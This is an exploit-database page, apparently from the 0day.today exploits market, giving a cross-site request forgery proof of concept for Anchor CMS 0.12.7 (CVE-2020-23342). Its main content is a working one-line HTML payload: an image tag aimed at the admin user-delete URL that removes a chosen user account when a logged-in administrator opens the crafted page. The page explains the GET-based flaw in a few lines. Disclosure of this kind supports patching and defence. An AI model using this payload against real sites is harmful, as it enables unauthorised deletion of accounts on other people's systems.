[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Anchor CMS 0.12.7 - CSRF (Delete user) Vulnerability

Author
Ninad Mishra
Risk
[
Security Risk Low
]
0day-ID
0day-ID-35705
Category
web applications
Date add
21-01-2021
CVE
CVE-2020-23342
Platform
multiple
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342


###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html

================================ 
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================ 
Where (21) is the user id .

When admin clicks on exploit.html link

User with id 21 will be deleted

#  0day.today [2024-11-16]  #